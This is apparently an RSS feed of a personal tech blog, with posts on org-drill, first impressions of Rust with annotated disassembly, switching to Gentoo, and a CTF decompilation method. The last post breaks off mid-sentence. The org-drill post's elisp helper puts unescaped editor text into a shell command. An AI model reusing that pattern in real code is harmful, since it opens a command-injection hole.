Jakob's Blog http://jakob.space/blog This is my very infrequently updated blog. There's not really any set topic, it's just a place for whatever I write. Replacing Anki With org-drill http://jakob.spaceReplacing+Anki+With+org-drill http://jakob.spaceReplacing+Anki+With+org-drill Fri, 13 Jul 2018 09:53:13 EST <p class="indent">Recently, I read Michael Nielsen's essay, <a href="http://augmentingcognition.com/ltm.html">"Augmenting Cognition"</a>. It talks about some very interesting use cases for the spaced repetition software "Anki" that made me want to try it out again. I'm familiar with Anki, as I used it extensively throughout my last year of high school to study for AP exams. At the time, Anki's "killer feature" for me over similar software was being able to typeset mathematical notation in LaTeX (the exams were Chemistry and Calculus, so almost all of the material to memorize was mathematical notation). It's a great piece of software; I've been using it with the brother I'm helping through summer school. But ever since I began using Gentoo, I've been trying to avoid packages like QtWebView, which has deterred me from installing Anki on my machine. With a little bit of searching, however, I found that there was an Emacs package for spaced repetition named 'org-drill', so I decided to check it out.</p> <p class="indent">org-drill is included in org by default (which happens to be included in Emacs by default), but it does need to be enabled. The steps to do so are outlined on the corresponding <a href="https://orgmode.org/worg/org-contrib/org-drill.html">worg page</a>. So far, I've used it to study German vocabulary and the material for my ham radio license exams, and I'm very happy with it. It has all of the features you might want from Anki, like Cloze deletion and double-sided cards, but I find that card creation is even more intuitive in org markup. Clozes are as simple as enclosing the answers in square brackets, and multi-sided cards just entail making multiple headings and setting the ":DRILL_CARD_TYPE:". You can even write your own card types in elisp. Another benefit of using org markup as the source for cards is that I can easily transform a plain text file into a deck using emacs macros.</p> <p class="indent">Unlike Anki, however, org-drill has support for the SM5 and SM8 scheduling algorithms. <a href="https://apps.ankiweb.net/docs/manual.html#what-algorithm">Anki is quite outspoken about the benefits of SM2 over the later renditions,</a> but I appreciate that I at least have the option to use these schedulers if I want to. The algorithms' parameters can also be finely tuned; the one I've found most useful is 'org-drill-learn-fraction', which I can use to decrease the amount of time before I see a card again.</p> <p class="indent">As I mentioned earlier, the feature that brought me to Anki was its support for typesetting math with LaTeX. Emacs certainly has support for rendering LaTeX, but I have a pretty wonky setup where I'm running Emacs in a terminal emulator, so what I opted for instead was a typesetting language that renders to unicode text. There are quite a few of these, but the one I was most impressed with is <a href="https://arthursonzogni.com/Diagon/">Diagon</a>. It's meant to be run in the browser, but the backend is written in C++ and can be compiled to run natively. Be warned, however, that the build system does require Java.</p> <p class="indent">First, I replace 'src/main.cpp' with the following. The version in VCS will unconditionally run the SequenceTranslator, but this modification enables us to select which translator to use from a command-line argument.</p> <pre><code class="lang-cpp">#include &quot;translator/Translator.h&quot; #include &lt;iostream&gt; int main(int argc, const char **argv) { if (argc != 2) { std::cerr &lt;&lt; &quot;usage: &quot; &lt;&lt; argv[0] &lt;&lt; &quot; [translator]&quot; &lt;&lt; std::endl; return 1; } std::string input; for (std::string line; std::getline(std::cin, line);) { input += line + &quot;\n&quot;; } auto translator = TranslatorFromName(argv[1]); std::cout &lt;&lt; (*translator)(input, &quot;&quot;) &lt;&lt; std::endl; return 0; } </code></pre> <p>Then, compiling is as easy as</p> <pre><code class="lang-sh">cd tools/antlr/ ./download_and_patch.sh cd ../../ mkdir build cd build cmake .. make </code></pre> <p>And for Emacs integration, I've added the following to my '.emacs'</p> <pre><code class="lang-elisp">;; Applies Diagon&#39;s &quot;Math&quot; formatter to the current region, replacing ;; the contents of the region with the formatted output. (defun format-math-at-region () (interactive) (let* ((math-to-format (buffer-substring (region-beginning) (region-end))) (command (format &quot;echo \&quot;%s\&quot; | diagon Math&quot; math-to-format))) ;; Bad and hacky. I&#39;m aware. (kill-region (region-beginning) (region-end)) (insert (string-trim-right (shell-command-to-string command))))) </code></pre> <p>It's not as powerful as LaTeX, but it certainly suits my needs.</p> <p><img src="/img/format_math_demo.gif" alt="Demo"></p> First Impressions of the Rust Programming Language http://jakob.spaceFirst+Impressions+of+the+Rust+Programming+Language http://jakob.spaceFirst+Impressions+of+the+Rust+Programming+Language Fri, 8 Jun 2018 13:02:33 EST <p class="indent">C is almost 50 years old, and C++ is almost 40 years old. While age is usually indicative of mature implementations with decades of optimization under their belts, it also means that the language's feature set is mostly devoid of modern advancements in programming language design. For that reason, you see a great deal of encouragement nowadays to move to newer languages - they're designed with contemporary platforms in mind, rather than working within the limitations of platforms like the PDP-11. Among said "new languages" are Zig, Myrddin, Go, Nim, D, Rust.. even languages like Java and Elixir that run on a virtual machine are occasionally suggested as alternatives to the AOT-compiled C and C++.</p> <p class="indent">I have plans to look into the characteristics that distinguish each and every one of these new programming languages, learning them and documenting my first impressions in the form of blog posts. This post is the beginning of that adventure: my first impressions of Rust. I chose to evaluate Rust first rather than one of the other aforementioned contenders for a few reasons. For one, it's backed by some big names like Mozilla, so I'm expecting it to have more polished documentation than its independently developed counterparts - we might as well step off with a language that I can learn without needing to read the compiler's source code. Also, I've been fairly critical of Rust in the past because that view was in-line with the opinions of my friends, but now that I've decided to go out of my way to learn a new programming language, I might as well use this as an opportunity to see if my criticisms were unfounded.</p> <p class="indent">Learning these new programming languages is certainly going to be an undertaking. Because Python and C were the first languages I was introduced to, I was able to simply buckle down, learn them, and apply them to pretty much everything I was doing at the time. When I tried to learn other languages later on, though, I had a hard time gauging whether or not I was making progress. I think that this is because I wasn't engaged with what I was learning; I was, at most, writing trivial programs with the language I was learning, and defaulting to C or Python whenever I needed to work on a "real" project. My goal is to learn these new languages to the extent that I can meaningfully evaluate them, so I've looked back on my past attempts and come to the conclusion that I either need to use them to develop something nontrivial, or make contributions to a free software project written in the language, as suggested by <a href="https://hackernoon.com/unconventional-way-of-learning-a-new-programming-language-e4d1f600342c">several</a> <a href="https://codewithoutrules.com/2017/09/09/learn-a-new-programming-language/">articles</a>. In the case of this post, it will be the former, as I've actually come to like Rust enough to use it for my <a href="https://github.com/TsarFox/rebuild">reimplementation of Ken Silverman's BUILD engine</a>.</p> <p class="indent">With my introduction for this series out of the way, we can get into my first impressions of Rust. The first step was diving into the documentation to learn it, so I guess it would make sense to begin with that. Simply put, there is no shortage of high-quality learning material for Rust. <a href="https://doc.rust-lang.org/book/second-edition/index.html">"The Rust Programming Language,"</a> the equivalent of TCPL for Rust, is surprisingly well-written. Even if you're familiar with a systems programming language like C, I would still recommend reading it cover-to-cover. I had initially started off with the "Rust for C++ Programmers" and the "Learn X in Y Minutes" tutorial for Rust, but until I read TRPL, there was a lot that didn't make sense, and I was completely lost when it came to using the standard library. The book is friendly, encouraging, and full of great examples that outline common patterns in the standard library and various third party crates. My only real complaint with TRPL is that some of the the analogies step foot into the territory of <a href="https://www.hillelwayne.com/post/monad-tutorials/">monad tutorials</a>. Some exceptional examples are comparing a <a href="https://doc.rust-lang.org/book/second-edition/ch15-04-rc.html">reference-counting pointer to the TV in a family room</a>, or comparing <a href="https://doc.rust-lang.org/book/second-edition/ch04-01-what-is-ownership.html">references to tables at a restaurant</a>. They aren't all bad, and there are a few that I actually really enjoy, like the comparison of <a href="https://doc.rust-lang.org/book/second-edition/ch16-02-message-passing.html">message passing concurrency to a river</a>, but most of them try too hard to relate the concept to something in the real world that it ends up being unhelpful. Fortunately, the book is on GitHub and accepts pull requests, so I have plans to send in suggestions for some alternatives.</p> <p class="indent">Despite the presence of great documentation, I predict that most people are still going to have a hard time learning Rust. It brings some concepts that you probably haven't seen before. As far as I'm aware, this is the first programming language to offer compile-time memory management. (C++ has smart pointers which are definitely similar, but those rules are enforced at runtime. Rust tightly integrates its concepts of ownership and lifetimes into the compiler.) TRPL does a good job of introducing the concepts for compile-time memory management, but I feel that that it only really scratches the surface. For that reason, I'd like to point anyone learning Rust to a great supplementary resource on the memory-model: <a href="http://cglab.ca/~abeinges/blah/too-many-lists/book/">"Learning Rust With Entirely Too Many Linked Lists"</a>. It's hands-on, and just about as approachable as TRPL. <a href="http://softwaremaniacs.org/blog/2016/02/12/ownership-borrowing-hard/en/">This post</a> might also help if you're having trouble grasping the general concept.</p> <p class="indent">That brings me to another point - the features that Rust brings to the table might be difficult to learn, but learning to use them pays off in the end. Compile-time memory management requires designing your programs in a way you might not be used to, but it definitely beats manual memory management, or letting a runtime take care of garbage collection.</p> <p class="indent">C's memory model, for example, is manually managed. Heap allocations are performed via malloc(3) and calloc(3), and those allocations exist until free(3) is called. Take this trivial piece of code for making a heap allocation containing a string:</p> <pre><code class="lang-c">#include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; int main(int argc, char **argv) { char *buf; // Make a heap allocation of 14 bytes. buf = calloc(14, 1); // calloc(3) CAN return a null pointer. if (buf == NULL) { return 1; } // Fill the allocated buffer with a string, and print it. strcpy(buf, &quot;Hello, world!&quot;); puts(buf); // Free the heap allocation, since we&#39;re done with it. // This won&#39;t always be at the end of the function, but it usually will be. free(buf); return 0; } </code></pre> <p class="indent">This model requires keeping track of the allocations you make and ensuring that they're freed when they aren't needed anymore - we easily could've forgotten that call to free(3). In this really trivial example, it doesn't matter because the process exits and the operating system reclaims the heap page, but if the program kept running after printing that string, we'd be dealing with a memory leak. Anyway, C's manual memory management is explicit enough that you can more or less predict what this will compile down to. GCC 6.4.0 emits following amd64 code:</p> <pre><code class="lang-asm"> # Prelude. 55 pushq %rbp 4889e5 movq %rsp, %rbp 4883ec20 subq $0x20, %rsp 897dec movl %edi, -0x14(%rbp) 488975e0 movq %rsi, -0x20(%rbp) # calloc(14, 1), store pointer on the stack. be01000000 movl $1, %esi bf0e000000 movl $0xe, %edi e892feffff callq sym.imp.calloc 488945f8 movq %rax, -8(%rbp) # Check for null pointer. 48837df800 cmpq $0, -8(%rbp) 7507 jne 0x750 b801000000 movl $1, %eax eb3b jmp 0x78b # (Really optimized) call to strcpy. 488b45f8 movq -8(%rbp), %rax 48ba48656c6c. movabsq $0x77202c6f6c6c6548, %rdx 488910 movq %rdx, 0(%rax) c740086f726c. movl $0x646c726f, 8(%rax) 66c7400c2100 movw $0x21, 0xc(%rax) # puts(buf) 488b45f8 movq -8(%rbp), %rax 4889c7 movq %rax, %rdi e846feffff callq sym.imp.puts # free(buf) 488b45f8 movq -8(%rbp), %rax 4889c7 movq %rax, %rdi e82afeffff callq sym.imp.free # Teardown. b800000000 movl $0, %eax c9 leave c3 retq 0f1f00 nopl 0(%rax) </code></pre> <p>The equivalent in Rust is similar, but as you'll see, we don't need to explicitly free the heap allocation.</p> <pre><code class="lang-rust">use std::io; use std::io::Write; fn main() { let buf = Box::new(b&quot;Hello, world!\n&quot;); io::stdout().write(*buf); } </code></pre> <p>rustc 1.25 compiles this down into the following amd64 code¹:</p> <pre><code class="lang-asm"> # Prelude. 4883ec48 subq $0x48, %rsp # Heap allocation, made by the &#39;std::boxed::Box&#39; smart pointer. b808000000 movl $8, %eax 89c1 movl %eax, %ecx 4889cf movq %rcx, %rdi 4889ce movq %rcx, %rsi e8caedffff callq sym.alloc::heap::exchange_malloc::h42fa40019bea1ed3 # We actually end up storing a reference to the bytestring, rather than copying the individual bytes into the box. # Regardless, I think this should still illustrate heap allocation fairly well, and I&#39;m trying to keep the example somewhat simple so we&#39;ll roll with it. 488d0de3e705. leaq str.Hello__world, %rcx 4889c6 movq %rax, %rsi 488908 movq %rcx, 0(%rax) 4889742410 movq %rsi, 0x10(%rsp) # Get the handle to stdout. e855590000 callq sym.std::io::stdio::stdout::h537f6f9874379378 4889442408 movq %rax, 8(%rsp) 488b442408 movq 8(%rsp), %rax 4889442430 movq %rax, 0x30(%rsp) # stdout.write(*buf); 488b4c2410 movq 0x10(%rsp), %rcx 488b11 movq 0(%rcx), %rdx be0e000000 movl $0xe, %esi 89f1 movl %esi, %ecx 488d7c2418 leaq 0x18(%rsp), %rdi 488d742430 leaq 0x30(%rsp), %rsi e8965a0000 callq sym._std::io::stdio::Stdout_as_std::io::Write_::write::h12094683b11bc5a8 # Free the &#39;std::io::Result&#39; that&#39;s returned by &#39;write&#39;. # We didn&#39;t check its, which is considered bad form, but this is just a simple example. 488d7c2418 leaq 0x18(%rsp), %rdi e8fef4ffff callq sym.core::ptr::drop_in_place::h72bdea260ebb17c9 # Free the stdout handle. 488d7c2430 leaq 0x30(%rsp), %rdi e8a6f4ffff callq sym.core::ptr::drop_in_place::h55479d5b85e18c56 # Finally, free the heap allocation we made. 488d7c2410 leaq 0x10(%rsp), %rdi e8faf5ffff callq sym.core::ptr::drop_in_place::ha5ac9a364139ad29 # Teardown. 4883c448 addq $0x48, %rsp c3 retq </code></pre> <p class="indent">Besides needing to allocate a handle to interact with stdout, rustc's emitted assembly does pretty much the same thing as that of GCC - allocate a buffer, fill it, then free it when we're done using it. Rust just façades this process with a friendlier abstraction.</p> <p class="indent">Another feature I've come to really enjoy is that there are no more NULL pointers - they've been replaced by a strict type system à la Haskell. In the C example above, we saw that calloc(3) can return NULL if glibc isn't able to allocate enough memory. We easily could've forgotten to put in the check to make sure the it isn't NULL, in which case we would get a segmentation fault. Preventing this sort of thing is what people are talking about when they say "memory safety." For a segmentation fault, the operating system has to jump in because we're doing something we shouldn't - dereferencing a NULL pointer. There are plenty of other naughty things we can do in C, like freeing a heap allocation twice, or even worse, writing outside the bounds of a buffer. Rust aims to have the compiler step in when we do something dumb, rather than leaving that to the operating system or exploit mitigation systems. To do this for NULL-able references, Rust provides an "Option" type (and the "Result" type) that can represent either something or nothing. You see it used extensively in the standard library. Consider the 'find' method of std::string::String, a method for finding the index of a substring in a string. There's the possibility that the substring exists in the string, in which case we'd just return that index, but what if it doesn't exist? In the case of C, we might return some silly value like '-1', but in Rust, we return an Option&lt;usize&gt; - either some usize value, or nothing. And the compiler makes sure we understand the implications of this.</p> <pre><code class="lang-rust">fn main() { let to_search = String::from(&quot;I may contain foo.&quot;); let index = to_search.find(&quot;foo&quot;); println!(&quot;index - 5: {}&quot;, index - 5); } </code></pre> <p class="indent">This is a pretty inane example, but please bear with me. If we try to compile this, rustc errors out, because we're trying to treat a variable that might represent nothing as if it were guaranteed to be something.</p> <pre><code>error[E0369]: binary operation `-` cannot be applied to type `std::option::Option&lt;usize&gt;` --&gt; test.rs:4:31 | 4 | println!("index - 5: {}", index - 5); | ^^^^^^^^^ | = note: an implementation of `std::ops::Sub` might be missing for `std::option::Option&lt;usize&gt;` </code></pre> <p class="indent">This would be fixed by inspecting the Option, ensuring that it <em>is</em> something, rather than nothing. It's an algebraic data type, so we can destructure it and work with the index if 'find' returned something.</p> <pre><code class="lang-rust">fn main() { let to_search = String::from(&quot;I may contain foo.&quot;); if let Some(index) = to_search.find(&quot;foo&quot;) { println!(&quot;index - 5: {}&quot;, index - 5); } } </code></pre> <p class="indent"><code>if let</code> is a syntax construct that I don't think any other language has, so I should probably give a brief explanation. That <code>if</code> block will run if and only if 'find' returned an instance of 'Option' that was 'Some', rather than 'None'. If an instance of 'Some' is returned, it contains our index, so we can destructure it and set that value to the variable, <code>index</code>, which we go on to use.</p> <p class="indent">You might expect this strictness to bring frustration, but the compiler emits errors worded simply enough that a layman could understand them, and often makes suggestions for fixing the code in question. The above isn't a great example, here's a better one:</p> <pre><code class="lang-rust">fn tabulate_slice(slice: &amp;[u8]) { for elem in slice.iter() { println!(&quot;{}&quot;, elem); } } fn main() { let vec = vec![1, 2, 3]; tabulate_slice(vec); } </code></pre> <pre><code>error[E0308]: mismatched types --&gt; test.rs:9:20 | 9 | tabulate_slice(vec); | ^^^ | | | expected &amp;[u8], found struct `std::vec::Vec` | help: consider borrowing here: `&amp;vec` </code></pre> <p class="indent">Rust has a great deal of functionality that makes it feel like your typical high-level Ruby or Python, despite being a compiled language. And it isn't limited to what I described above - here are a few of the other features I was really impressed with:</p> <h3>Conditionals are Expressions</h3> <pre><code class="lang-rust">let var = if true { 1 } else { 2 }; </code></pre> <h3>No parentheses for the expression part of if/while/for</h3> <p>Heh, I bet you've seen enough of that already.</p> <h3>Semantics for Infinite Loops</h3> <pre><code class="lang-rust">loop { break; } </code></pre> <h3>Semantics for Unused Variables/Parameters</h3> <pre><code class="lang-rust">for _ in 0..5 { println!(&quot;I&#39;m printed 5 times!&quot;); } </code></pre> <h3>Range Notation, Type Inference, and Iterators</h3> <p>Again, you've seen these already.</p> <h3>Tuples, Destructuring, and Pattern Matching via <code>match</code> and <code>if let</code> Expressions</h3> <pre><code class="lang-rust">match to_search.find(&quot;foo&quot;) { Some(index) =&gt; println!(&quot;Foo at {}&quot;, index), None =&gt; println!(&quot;No foo :(&quot;), } // Or, more idiomatically: if let Some(index) = to_search.find(&quot;foo&quot;) { println!(&quot;Foo at {}&quot;, index); } else { println!(&quot;No foo :(&quot;); } </code></pre> <h3>Automated Testing is Integrated Into the Build System</h3> <pre><code class="lang-rust">#[cfg(test)] mod tests { #[test] fn it_works() { assert_eq!(2 + 2, 4); } } </code></pre> <p>This will be run upon invocation of <code>cargo test</code>.</p> <h3>Isolation of Unsafe Code</h3> <p class="indent">There's a set of <a href="https://doc.rust-lang.org/book/second-edition/ch19-01-unsafe-rust.html">rules</a> to ensure that the implications of working with unsafe code are properly contained, but the gist of it is that unsafe code is isolated by the scoping system. Mostly, I'm glad that the language allows you to work with unsafe code at all.</p> <pre><code class="lang-rust">fn main() { unsafe { asm!(&quot;INT3&quot;); } } </code></pre> <hr> <p class="indent">That's my opinion on the language design aspect, but the community and ecosystem are important as well. My experience with the Rust community is limited, but from what little I have seen, those in the community are friendly and rational. I submitted <a href="https://github.com/mattnenterprise/rust-imap/issues/67">a few issues to rust-imap</a> and received prompt and helpful responses. I can also confidently say that the Rust ecosystem a pleasure to work with. It obviously isn't as mature as some other language ecosystems, but adding a "crate" dependency to your projects is as easy as adding a line to your 'Cargo.toml'. It's equally easy to publish the code and documentation for crates you've made yourself. I threw together <a href="https://github.com/TsarFox/wildmidi">a library for interacting with WildMIDI</a>, and a <a href="https://docs.rs/">docs.rs</a> page popped up without any intervention from me. Painless.</p> <p class="indent">The process of linking those crates into the executable is relatively primitive, and there are a few complaints in that respect. It's mostly static linking, so the argument is "you get outdated copies of several libraries on your computer." However, the benefits of dynamic linking as the alternative is a <a href="http://harmful.cat-v.org/software/dynamic-linking/">debate I don't want to get into in this post</a>. Right now I'll leave it as, "it's not an option in the current implementation, and that's a disadvantage," even if I'm blissfully ignorant of the size of my Rust binaries and <em>might</em> have some complaints about dynamic linking.</p> <p>All in all, I'm very happy with Rust. Maybe it isn't "there" yet as a viable replacement to C, but it's promising and I have a feeling that, with time, it will fit nicely into GNU/Linux ecosystem.</p> <hr> <p class="indent">1: A previous version of this post included <em>all</em> of the assembly emitted by the compiler, but in this revision, I've chosen to remove Rust's error/panic handling code because I believe that it actually detracts from the concept I'm trying to show.</p> Installing Gentoo: One Month Later http://jakob.spaceInstalling+Gentoo%3A+One+Month+Later http://jakob.spaceInstalling+Gentoo%3A+One+Month+Later Mon, 28 May 2018 20:10:39 EST <p class="indent">It seems that the general consensus on "distro hopping," the act of constantly switching between distributions of GNU/Linux, is that it's a bad habit that should be consciously avoided. If you do a search for the term, you'll get articles with titles along the lines of "How I Stopped Distro Hopping." But it's also a term that gets thrown around loosely, and I think that that "distro hopping" is an acceptable practice in a lot of the contexts where the phrase is used. Needless to say, I've "hopped" distributions in the past month, and this blog post is going to describe the highs and lows of that experience.</p> <p class="indent">My experiences with GNU/Linux began when I installed openSUSE about four years ago. I chose it over something more conventional like Ubuntu for its integration with KDE Plasma 4 (I'm aware that I suffered from bad taste at the time). I stuck with that until I decided to try Fedora for no particular reason, which was short-lived. I later switched to Arch Linux to fit in with the cool kids, and that became my daily driver for a little over two years. Recently, however, I've switched to Gentoo, because I've wanted to try GNU/Linux without systemd and friends. Many conversations with people over IRC convinced me that the maintenance model of those packages is <a href="https://github.com/systemd/systemd/issues/6237">concerning, to say the least</a>, and that it's preferable if the operations-critical parts of my operating system aren't ridden with CVE's. Gutting Arch of the beasts within is possible, but seriously complicates everything, so I decided that the best course of action was to just throw the baby out with the bathwater and use this as an opportunity to experiment with something I'd been meaning to try.</p> <p class="indent">Gentoo has been on my radar ever since I installed Arch, as I had several friends who loved to talk about the merits of a source-based distribution. My original plan was to wait until I had a machine I could comfortably experiment with, separate from my workstation or laptop, but since I was hopping distros anyway, I decided to just go ahead and get my hands dirty. Of course, I didn't go into the whole migration process without concerns. For one, I want to cleanse <em>all</em> of machines of systemd. That includes the Raspberry Pi I use as a home server, and I don't think it's powerful enough to be compiling everything from source. I opted to install Alpine on that instead. The other problem was that my laptop's only storage device was an SSD, which I didn't want to subject to excessive writes. Fortunately the solution to that was straightforward: I was able to mount '/var/tmp/portage' as tmpfs so that all the object files generated while compiling got dumped to an in-memory filesystem instead of the disk.</p> <p class="indent">After making sure that everything I needed to do was possible on the new setup, I went ahead and installed it on both my workstation and laptop. The canonical reference for installing Gentoo, dubbed "the handbook," is incredibly well-written, so the installation process was painless. I think the quality of documentation is a big benefit that Gentoo has over Arch; everyone praises the Arch wiki, but I find that the Gentoo documentation is far more informative and much more consistent. Setting it up past the initial installation really wasn't difficult either - I had X11 running the same night.</p> <p class="indent">I also used this as an opportunity to try out some new software. On Arch, I was using i3 and rxvt-unicode, but now I'm on dwm and st and I'm really enjoying both of them. These programs are configured at compile-time, which would've made using them on Arch a bit unwieldy, but Gentoo's package manager makes the whole process trivial. I just throw any patches I want in '/etc/portage/patches', edit the 'config.h' files in '/etc/portage/savedconfig', and emerge the package.</p> <p class="indent">Gentoo's package manager is by far the best I've used in my four years of running GNU/Linux. Being able to interface with it through a couple of files in '/etc' is a great interface. It also brings USE flags, which is probably the poster child of Gentoo's features. If you're not familiar with USE flags, they allow you to enable or disable certain features at compile-time. As an example, say I want to play some Goldeneye on my Nintendo 64 and use my computer as a monitor. I have a cheap USB capture card with a kernel driver exposing the Video4Linux API. I'll need some sort of video player to put the stream on my monitor, but that video player is going to need to come with support for said Video4Linux API. I'm what you might call a special case - most GNU/Linux users don't have capture cards, so that feature isn't important to them. If it isn't important to them, why should they have to waste disk space housing all the code and dependencies for it? This is where conditional-compilation comes in. During the process of turning source code into executable binaries, certain features can be turned on or off. In a binary distribution like Arch Linux, the package maintainers need to make an executive decision about which features should be enabled, because they're making a binary for <strong>everyone</strong>. And, last I checked, they decided that V4L support wasn't important enough for them to enable it. Bummer. If you want that feature, you'll need to compile it yourself. And if a package has features you don't care about, bummer. You have to either deal with all the dependencies that those features bring in, or compile it yourself.</p> <p class="indent">USE flags makes this a lot easier by integrating conditional compilation options into the package manager, rather than forcing you to wrangle with the configure script of whatever build system the software uses. For example, I can compile mpv with support for V4L simply by enabling the 'v4l' USE flag. The nice thing about this is that all packages supporting V4L recognize this same USE flag, and I can enable it globally - compiling V4L support into everything on my system without putting much thought into it. And if I just want it for mpv instead of everything on my system, I'm also able to enable it for just certain packages.</p> <p class="indent">This freedom does come with the downsides of, well, having to compile everything from source. Compiling software takes time and processing power, and trying to optimize the process has caused me some headaches. In Gentoo, you'll want to pick a decent value for '--jobs' in 'make.conf' so that compilation is fast. '--jobs', or '-j' is a signal to the build system that it can run some number of tasks in parallel. I started out with '-j8' on my laptop, since it has 8 cores. This worked great for smaller packages, but when I tried to emerge Firefox, my machine gave up half-way through. It was still running. I could Ctrl+Z from 'emerge' and use it, but the compilation process had hanged and my only option was to restart it, to which it would hang at another point in the compilation process. I tried it again with '-j4' and it was able to compile without any trouble, it just took much longer. I had a similar issue on my workstation - it has a quad-core processor so I was using '-j4', but I was regularly getting segmentation faults while emerging large packages such as LLVM (apparently a hardware issue that I need to look into), so I lowered it to '-j2'. Of course, looking back on it now, <a href="https://blogs.gentoo.org/ago/2013/01/14/makeopts-jcore-1-is-not-the-best-optimization/">the number of cores your machine has isn't a good value for '-j' anyway.</a></p> <p class="indent">Another great thing about Portage is the API for making your own packages. It's shell scripts, so it's similar to how you'd go about making a package on Arch, but I find the API feels like a massive hack. For one, <a href="https://devmanual.gentoo.org/">the documentation</a>, again, towers over that of Arch, but it also brings something reminiscent of a standard library: eclasses, which enable you to abstract the commonality between packages using the same build system. Also, instead of having just one big AUR, unofficially maintained packages are distributed in user-managed "overlays." I'd think that pacman can probably do something similar, but you almost never see it in practice.</p> <p class="indent">All in all, I'm very happy with the level of customization and freedom that Gentoo offers me, and I haven't missed systemd one bit. OpenRC, ALSA, and wpa_supplicant are all I need. Going forward, I'm hoping to become more involved in the Gentoo community - becoming active on the forums and IRC, and hosting an overlay for the handful of ebuilds I've made. The Gentoo community seems much more tightly-knit than the Arch community, and I'm looking forward to meeting some new friends.</p> Decompilation By Hand http://jakob.spaceDecompilation+By+Hand http://jakob.spaceDecompilation+By+Hand Thu, 1 Mar 2018 19:00:33 EST <p class="indent">My capture-the-flag team played in the Insomni'hack teaser this year. During the competition, I worked on a single challenge titled "sapeloshop." It was labeled as "Medium-Hard," and it was in the binary exploitation category. The source code for the server wasn't provided, so reverse engineering was necessary. I don't think that having to reverse the binary was supposed to be the hard part, as most of the behavior could have been inferred through some high-level analysis, yet I spent nearly five hours fruitlessly trying to reverse it, and the subsequent burnout was bad enough that I went home early. This wasn't the first time a reversing task had gotten the best of me; there had been a few competitions last year where I felt a similar loss in motivation. Noticing this recurring pattern frustrated me, and that frustration drove me to think about ways to improve myself as a reverse engineer.</p> <p class="indent">My initial idea was to work on expanding my skill set, but with some further reflection, I came to the realization that the weakness was my process. I was going at the task of reverse engineering without a plan: beginning by opening the binary in radare, propagating from the entrypoint, and renaming a few variables as I went along. I was trying to make sense of the program by passively reading the disassembly listing. This <em>might</em> work for someone who lives and breathes assembly, but that certainly doesn't apply to me. What I needed was a way to engage with the binary at hand beyond trying to passively absorb it.</p> <p class="indent">With that, my first step was to come up with a more formally-defined idea of what's involved in "reverse engineering." I still don't think I have anything close to a complete description, but pondering on how reverse engineering tools are designed certainly helped to solidify my existing understanding. Namely, I was reminded of software suites advertised as "decompilers." They serve as a stepping stone in an <strong>iterative</strong> process of turning machine code into something that would be easier for a human to understand. They give an obviously machine-generated C/C++ representation of the machine code, and the reverse engineer continues by filling in the blanks with semantics.</p> <p class="indent">Now, I have a few issues with the idea of automated decompilation. For one, the tooling simply isn't accessible. The only working decompiler I've used, IDA Pro, is ridiculously expensive. Also, when I say, "working," I mean that it doesn't segfault upon opening the binary. Even IDA Pro doesn't work perfectly in every situation - especially those in which the binary has been intentionally obfuscated. Because of this, there are arguments against the use of decompilers: notably, <a href="https://blog.ret2.io/2017/11/16/dangers-of-the-decompiler/">this article</a>.</p> <p class="indent">But the goal wasn't to have a program to do the work for us anyway, it was to come up with a more effective methodology for reverse engineering a binary. Unlike software, human reversers can adapt to the situation at hand - they don't need rules defined in the same way that a computer would. As such, I've come up with a protocol in a similar vein to <a href="https://en.wikipedia.org/wiki/SQ3R">SQ3R</a> for reverse engineering machine code to higher-level constructs. The protocol is still in its infancy, and I have hopes to expand upon it in the future, but I have found it to still be quite useful in its current state.</p> <p class="indent">I'd consider subroutines to be the fundamental atoms of a binary, and that's what this protocol focuses on. However, being able to understand the subroutines that compose a program doesn't necessarily imply an understanding of the whole program. These are things that I hope to incorporate into the protocol in the future, but for now, they are given as a handful of necessary precursors.</p> <p class="indent">For one, you should get a high-level understanding of what the program does. I would recommend initially treating it as a black box: What does this program do? Is it a web server? A crypto algorithm? I find that it's useful to copy down any text that the program outputs, as you can use the string references later on when you look at the machine code. You should also test plenty of inputs. What does the program do for typical edge cases? What error handling does it do? This might all seem extremely mundane, but if you understand the program at this level, it gives you things to recognize in the disassembly listing. This is absolutely essential when it comes to something more complicated than the toy programs you might see in a capture-the-flag. I've been working a lot with the Team Fortress 2 binaries recently, and understanding how and where certain string references are used has given me a way to find just the functionality I'm interested in, as opposed to trying to understand the entire 33 MB shared object.</p> <p class="indent">That brings me to another point: you might not even need to reverse all of the subroutines in the binary. In a binary exploitation challenge, it might make sense to audit the seemingly mundane input-handling functions, but if you can tell from the usage alone that all a subroutine does is print something, it probably isn't worth your time to disassemble it. Remember, you can always come back to something later, but if you waste your time on it, those are valuable competition minutes that you'll never get back.</p> <p class="indent">Finally, this is more general, and it's something that I think every reverse engineer knows, but it's worth mentioning regardless. If you don't know the ISA, the architecture's calling conventions, or the quirks of the language design and the compiler, it might be in your best interest to create a "lexicon" of high-level constructs and how they're represented in assembly. There's absolutely no shame in doing this, and it's been especially helpful for me when I've looked at any binaries that were compiled with MSVC. One tool that I've found useful for creating these lexicons is the <a href="https://godbolt.org/">Godbolt Compiler Explorer</a>.</p> <p class="indent">Hopefully that wasn't too long of an introduction. Now we can get into the protocol itself. It's composed of five steps and make up a mnemonic: "SCARS." The first step is to "skim," or "scan." The premise is to first get an idea which memory addresses the subroutine spans, or how long it is. I usually look for the typical "function epilogue," which might include a stack canary check, or it might just be a "pop %rbp; ret." Then, get context. See where the subroutine is called and how it's called - figure out if there are any arguments to the subroutine, and see if it returns anything. Finally, look over the disassembly listing for the routine, paying attention to the use of stack variables and global variables. Do any of those variables look like they might be classes/structures?</p> <p class="indent">The second step is to "chunk." The first step should have given you a rough idea of the control flow, but now you need to break the subroutine into smaller sets of instructions that you can analyze. I usually separate based on whether or not a set of instructions are skipped by a conditional jump.</p> <p class="indent">The third step is "arrange." Simply put, this involves taking your findings about stack variables and such from the first step, and converting them to declarations in the high-level language. I also like to make stubs for any other subroutines that are called, since I'll probably be reversing those later anyway. This third step also ties in with the fourth step, which is to "recognize." This involves looking back on your lexicon of patterns, and converting them to the high-level constructs that they represent. These two steps are done simultaneously and are basically where you try to manually decompile the chunks of machine code you plotted out in the previous step.</p> <p class="indent">The final step is to "simplify," which entails simplifying the resultant code into something perhaps more understandable. For example, 1 &lt;&lt; 4 is equivalent to 1 * 2^4, or just 4. This also might be where you replace magic numbers with constants. Whenever I see 0 passed to read(3), I replace that with "STDIN_FILENO".</p> <p class="indent">I spent a little under twenty minutes last night reversing the binary from the challenge I mentioned at the beginning of this post. That's not a lot of time compared to how much I spent during the competition, and I got surprisingly far (almost all of main!) If this 